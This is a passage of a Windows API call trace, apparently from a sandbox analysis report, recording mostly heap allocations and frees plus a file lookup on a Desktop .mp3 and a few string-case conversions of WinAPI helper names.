(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0118.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31429790, ftCreationTime.dwHighDateTime=0x1d5ee80, ftLastAccessTime.dwLowDateTime=0x354fc030, ftLastAccessTime.dwHighDateTime=0x1d5e942, ftLastWriteTime.dwLowDateTime=0x354fc030, ftLastWriteTime.dwHighDateTime=0x1d5e942, nFileSizeHigh=0x0, nFileSizeLow=0x775e, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="2V N4wBRBU.mp3", cAlternateFileName="2VN4WB~1.MP3")) returned 0x41ac500 [0118.476] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0118.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0118.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0118.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0118.476] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0118.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0118.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0118.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0118.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0118.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.477] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0118.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0118.477] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0118.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0118.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0118.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0118.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0118.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0118.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b90 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0118.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0118.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0118.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0118.479] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0118.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.482] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0118.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.484] 